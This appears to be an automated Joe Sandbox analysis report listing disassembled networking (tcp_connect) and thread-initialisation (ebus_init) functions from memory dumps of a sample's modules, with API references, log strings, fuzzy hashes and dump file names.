String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 1de2c60ab64b2229bbcd90940721c67949cde75da0b91e5b5a21366dd128d970
Instruction ID: 9171127a95b5d3814f832aa365c951f33d16b696eeb4c01200654d04bf98700a
Opcode Fuzzy Hash: 1de2c60ab64b2229bbcd90940721c67949cde75da0b91e5b5a21366dd128d970
Instruction Fuzzy Hash: F851B121A0DE43C2EF385F27E941AF96658AF457B8F042379E82E466F5EE7DE4058300

Function 00007FFE1A4F42EC Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE1A4F4310
htonl.WS2_32 ref: 00007FFE1A4F43AC
htons.WS2_32 ref: 00007FFE1A4F43BD
connect.WS2_32 ref: 00007FFE1A4F43D6
WSAGetLastError.WS2_32 ref: 00007FFE1A4F43FC
select.WS2_32 ref: 00007FFE1A4F446C
WSAGetLastError.WS2_32 ref: 00007FFE1A4F447C
WSAGetLastError.WS2_32 ref: 00007FFE1A4F44BE

Part of subcall function 00007FFE1A4F3F89: ioctlsocket.WS2_32 ref: 00007FFE1A4F3FAF

Part of subcall function 00007FFE1A4F3ED4: setsockopt.WS2_32 ref: 00007FFE1A4F3EFC
Part of subcall function 00007FFE1A4F3ED4: setsockopt.WS2_32 ref: 00007FFE1A4F3F28

WSAGetLastError.WS2_32 ref: 00007FFE1A4F44EB

Strings

[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE1A4F4503
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE1A4F448F
tcp_connect, xrefs: 00007FFE1A4F436D, 00007FFE1A4F4488, 00007FFE1A4F44A6, 00007FFE1A4F44D3, 00007FFE1A4F44FC, 00007FFE1A4F4526
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE1A4F452D
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE1A4F44AD
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE1A4F4374
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE1A4F44DA

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: ef2c9e022da29fa2bc4eb5b33516572d35ec7675e301cc468b5555df399c2eb0
Instruction ID: e7b75cadf266eddee0feb3ecc3136eb95037321f8806b3f15ea1489933b2b20a
Opcode Fuzzy Hash: ef2c9e022da29fa2bc4eb5b33516572d35ec7675e301cc468b5555df399c2eb0
Instruction Fuzzy Hash: 09518F61B0CE4381EA249F1AE8002BE6690EF46F75F1422F7DD2E466F6DE7CE5158700

Function 00007FFE1A52175C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE1A521780
htonl.WS2_32 ref: 00007FFE1A52181C
htons.WS2_32 ref: 00007FFE1A52182D
connect.WS2_32 ref: 00007FFE1A521846
WSAGetLastError.WS2_32 ref: 00007FFE1A52186C
select.WS2_32 ref: 00007FFE1A5218DC
WSAGetLastError.WS2_32 ref: 00007FFE1A5218EC
WSAGetLastError.WS2_32 ref: 00007FFE1A52192E

Part of subcall function 00007FFE1A5213F9: ioctlsocket.WS2_32 ref: 00007FFE1A52141F

Part of subcall function 00007FFE1A521344: setsockopt.WS2_32 ref: 00007FFE1A52136C
Part of subcall function 00007FFE1A521344: setsockopt.WS2_32 ref: 00007FFE1A521398

WSAGetLastError.WS2_32 ref: 00007FFE1A52195B

Strings

[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE1A52199D
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE1A52194A
tcp_connect, xrefs: 00007FFE1A5217DD, 00007FFE1A5218F8, 00007FFE1A521916, 00007FFE1A521943, 00007FFE1A52196C, 00007FFE1A521996
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE1A5217E4
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE1A52191D
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE1A521973
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE1A5218FF

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 57cc2912fc060d9ef2f48e6874cd69bdb85e37c9ded0e92350f58081cfba0796
Instruction ID: 6c9f56ed9c81dccea791c0a0506ea70492d4db974391530b73ac1c3a3730f4bf
Opcode Fuzzy Hash: 57cc2912fc060d9ef2f48e6874cd69bdb85e37c9ded0e92350f58081cfba0796
Instruction Fuzzy Hash: 2A519379B0CF4292E6209B57A40027A7662BF96F74F1403F7E82D46AF5EE7DE5058700

Function 00007FFE11505A3C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE11505A60
htonl.WS2_32 ref: 00007FFE11505AFC
htons.WS2_32 ref: 00007FFE11505B0D
connect.WS2_32 ref: 00007FFE11505B26
WSAGetLastError.WS2_32 ref: 00007FFE11505B4C
select.WS2_32 ref: 00007FFE11505BBC
WSAGetLastError.WS2_32 ref: 00007FFE11505BCC
WSAGetLastError.WS2_32 ref: 00007FFE11505C0E

Part of subcall function 00007FFE115056D9: ioctlsocket.WS2_32 ref: 00007FFE115056FF

Part of subcall function 00007FFE11505624: setsockopt.WS2_32 ref: 00007FFE1150564C
Part of subcall function 00007FFE11505624: setsockopt.WS2_32 ref: 00007FFE11505678

WSAGetLastError.WS2_32 ref: 00007FFE11505C3B

Strings

[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE11505C7D
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE11505C2A
tcp_connect, xrefs: 00007FFE11505ABD, 00007FFE11505BD8, 00007FFE11505BF6, 00007FFE11505C23, 00007FFE11505C4C, 00007FFE11505C76
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE11505BDF
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE11505C53
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE11505BFD
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE11505AC4

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: c4e50038f105fe85b96ee30fc9bc49187e7416d53b1e2d5e671e6eceb2ce5a81
Instruction ID: f1e06623b319b2a2c5f947524a92902df9f05c28e6c8cb68def1241b4ecbc6e4
Opcode Fuzzy Hash: c4e50038f105fe85b96ee30fc9bc49187e7416d53b1e2d5e671e6eceb2ce5a81
Instruction Fuzzy Hash: 6C51D321B1CE4282E7209B97E84027E775AAF84778F5403B9D92E476F5EFBCE5458700

Function 00007FFE11EC20FC Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE11EC2120
htonl.WS2_32 ref: 00007FFE11EC21BC
htons.WS2_32 ref: 00007FFE11EC21CD
connect.WS2_32 ref: 00007FFE11EC21E6
WSAGetLastError.WS2_32 ref: 00007FFE11EC220C
select.WS2_32 ref: 00007FFE11EC227C
WSAGetLastError.WS2_32 ref: 00007FFE11EC228C
WSAGetLastError.WS2_32 ref: 00007FFE11EC22CE

Part of subcall function 00007FFE11EC1D99: ioctlsocket.WS2_32 ref: 00007FFE11EC1DBF

Part of subcall function 00007FFE11EC1CE4: setsockopt.WS2_32 ref: 00007FFE11EC1D0C
Part of subcall function 00007FFE11EC1CE4: setsockopt.WS2_32 ref: 00007FFE11EC1D38

WSAGetLastError.WS2_32 ref: 00007FFE11EC22FB

Strings

[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE11EC22EA
tcp_connect, xrefs: 00007FFE11EC217D, 00007FFE11EC2298, 00007FFE11EC22B6, 00007FFE11EC22E3, 00007FFE11EC230C, 00007FFE11EC2336
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE11EC229F
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE11EC22BD
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE11EC2184
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE11EC2313
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE11EC233D

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 00be52f98493886c70a6fc4778f049fbd0ac6de21f4713c6c0349c451989cf9d
Instruction ID: a4e8e206fae03f077d5d12388a7947ced50ab9c0a54502c878204bcedc588274
Opcode Fuzzy Hash: 00be52f98493886c70a6fc4778f049fbd0ac6de21f4713c6c0349c451989cf9d
Instruction Fuzzy Hash: 5251C465A0CE8381EB209B96EC013BFA698EF84770F941376E92E466F5DE3DF4058301

Function 00007FFE11BDA7B8 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE11BDA7D3
CreateThread.KERNEL32 ref: 00007FFE11BDA813
GetLastError.KERNEL32 ref: 00007FFE11BDA85B
GetLastError.KERNEL32 ref: 00007FFE11BDA933

Part of subcall function 00007FFE11BDC852: fwrite.MSVCRT ref: 00007FFE11BDC8FE
Part of subcall function 00007FFE11BDC852: fflush.MSVCRT ref: 00007FFE11BDC90A

Strings

[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE11BDA945
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11BDA847
P, xrefs: 00007FFE11BDA9AB
, xrefs: 00007FFE11BDA879
ebus_init, xrefs: 00007FFE11BDA840, 00007FFE11BDA866, 00007FFE11BDA93E, 00007FFE11BDAA33
~, xrefs: 00007FFE11BDA9A6
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE11BDA86D
, xrefs: 00007FFE11BDA951
~, xrefs: 00007FFE11BDA8D9
P, xrefs: 00007FFE11BDA8E2
[I] (%s) -> %s, xrefs: 00007FFE11BDAA3A
Done, xrefs: 00007FFE11BDAA2C

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 16bc6f95adb63556d6d9dd7628c5118d99aff38ef0e314d2a351385bf1973825
Instruction ID: 5d65fdccc5a5177e3f9fef671f1a865f259731f61d7f1dc274887219b9794a7d
Opcode Fuzzy Hash: 16bc6f95adb63556d6d9dd7628c5118d99aff38ef0e314d2a351385bf1973825
Instruction Fuzzy Hash: A951FB24E0DF43C2FF385F269485BF9125C9F04339F6463B6C96E462F1DE5E69868242

Function 00007FFE1A4F2B78 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE1A4F2B93
CreateThread.KERNEL32 ref: 00007FFE1A4F2BD3
GetLastError.KERNEL32 ref: 00007FFE1A4F2C1B
GetLastError.KERNEL32 ref: 00007FFE1A4F2CF3

Part of subcall function 00007FFE1A4F1352: fwrite.MSVCRT ref: 00007FFE1A4F13FE
Part of subcall function 00007FFE1A4F1352: fflush.MSVCRT ref: 00007FFE1A4F140A

Strings

P, xrefs: 00007FFE1A4F2CA2
Done, xrefs: 00007FFE1A4F2DEC
~, xrefs: 00007FFE1A4F2C99
, xrefs: 00007FFE1A4F2C39
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE1A4F2C2D
[I] (%s) -> %s, xrefs: 00007FFE1A4F2DFA
P, xrefs: 00007FFE1A4F2D6B
, xrefs: 00007FFE1A4F2D11
~, xrefs: 00007FFE1A4F2D66
ebus_init, xrefs: 00007FFE1A4F2C00, 00007FFE1A4F2C26, 00007FFE1A4F2CFE, 00007FFE1A4F2DF3
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE1A4F2D05
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE1A4F2C07

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 71f265c3c1eede2c7d2b485d5ac79c599bdc008be8f893485ec85ad0aa213f17
Instruction ID: 886f93cc5bd0db728afd3c666d91797e571fbf98f663ecd011b7bf6fc22a61ad
Opcode Fuzzy Hash: 71f265c3c1eede2c7d2b485d5ac79c599bdc008be8f893485ec85ad0aa213f17
Instruction Fuzzy Hash: 3E510B20B0CF4382F6604B5EA5C43BD2254AF05B76F2422F7C96E062F5DE7DA9A59242

Function 00007FFE1A5264F8 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE1A526513
CreateThread.KERNEL32 ref: 00007FFE1A526553
GetLastError.KERNEL32 ref: 00007FFE1A52659B
GetLastError.KERNEL32 ref: 00007FFE1A526673

Part of subcall function 00007FFE1A5277A2: fwrite.MSVCRT ref: 00007FFE1A52784E
Part of subcall function 00007FFE1A5277A2: fflush.MSVCRT ref: 00007FFE1A52785A

Strings

~, xrefs: 00007FFE1A5266E6
, xrefs: 00007FFE1A526691
P, xrefs: 00007FFE1A5266EB
P, xrefs: 00007FFE1A526622
[I] (%s) -> %s, xrefs: 00007FFE1A52677A
, xrefs: 00007FFE1A5265B9
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE1A526685
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE1A5265AD
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE1A526587
ebus_init, xrefs: 00007FFE1A526580, 00007FFE1A5265A6, 00007FFE1A52667E, 00007FFE1A526773
~, xrefs: 00007FFE1A526619
Done, xrefs: 00007FFE1A52676C

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 72c1952e04f3fafd5f39843409f0131d257733a5e654969ec2f207c9cf63f023
Instruction ID: bd3b59d5bc894bb346800cb645a7e1f4d5338f2f17241a4172d35f4352cde3a1
Opcode Fuzzy Hash: 72c1952e04f3fafd5f39843409f0131d257733a5e654969ec2f207c9cf63f023
Instruction Fuzzy Hash: 8751E620F0CF03C2FA204796A5C037922A2DF57F74F6446F7C56E06AF5DE6DA8859262

Function 00007FFE115017F8 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE11501813
CreateThread.KERNEL32 ref: 00007FFE11501853
GetLastError.KERNEL32 ref: 00007FFE1150189B
GetLastError.KERNEL32 ref: 00007FFE11501973

Part of subcall function 00007FFE115040D2: fwrite.MSVCRT ref: 00007FFE1150417E
Part of subcall function 00007FFE115040D2: fflush.MSVCRT ref: 00007FFE1150418A

Strings

P, xrefs: 00007FFE11501922
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11501887
, xrefs: 00007FFE115018B9
[I] (%s) -> %s, xrefs: 00007FFE11501A7A
, xrefs: 00007FFE11501991
P, xrefs: 00007FFE115019EB
~, xrefs: 00007FFE11501919
~, xrefs: 00007FFE115019E6
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE115018AD
ebus_init, xrefs: 00007FFE11501880, 00007FFE115018A6, 00007FFE1150197E, 00007FFE11501A73
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE11501985
Done, xrefs: 00007FFE11501A6C

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: ecb98d2aab39831607e86e4dd35b83607107451fee7c1bb54a517d6ba907c02a
Instruction ID: e5f8bbd744298312f49814e96d099dbbe1a1a85b8db0b9d2b65c8ee8a955a10c
Opcode Fuzzy Hash: ecb98d2aab39831607e86e4dd35b83607107451fee7c1bb54a517d6ba907c02a
Instruction Fuzzy Hash: 4E51F720E0CF0382F7619796A5C437C32999F05374F2457BAC56E162F1EFADEA859342

Function 00007FFE11EC17F8 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE11EC1813
CreateThread.KERNEL32 ref: 00007FFE11EC1853
GetLastError.KERNEL32 ref: 00007FFE11EC189B
GetLastError.KERNEL32 ref: 00007FFE11EC1973

Part of subcall function 00007FFE11EC9DC2: fwrite.MSVCRT ref: 00007FFE11EC9E6E
Part of subcall function 00007FFE11EC9DC2: fflush.MSVCRT ref: 00007FFE11EC9E7A

Strings

, xrefs: 00007FFE11EC1991
P, xrefs: 00007FFE11EC19EB
, xrefs: 00007FFE11EC18B9
ebus_init, xrefs: 00007FFE11EC1880, 00007FFE11EC18A6, 00007FFE11EC197E, 00007FFE11EC1A73
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE11EC1985
~, xrefs: 00007FFE11EC1919
[I] (%s) -> %s, xrefs: 00007FFE11EC1A7A
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE11EC18AD
P, xrefs: 00007FFE11EC1922
~, xrefs: 00007FFE11EC19E6
Done, xrefs: 00007FFE11EC1A6C
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11EC1887

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: a4765926d0bec962e3b64301d7cbedd34045c1c1f3eb295a71ea3bfcd381612a
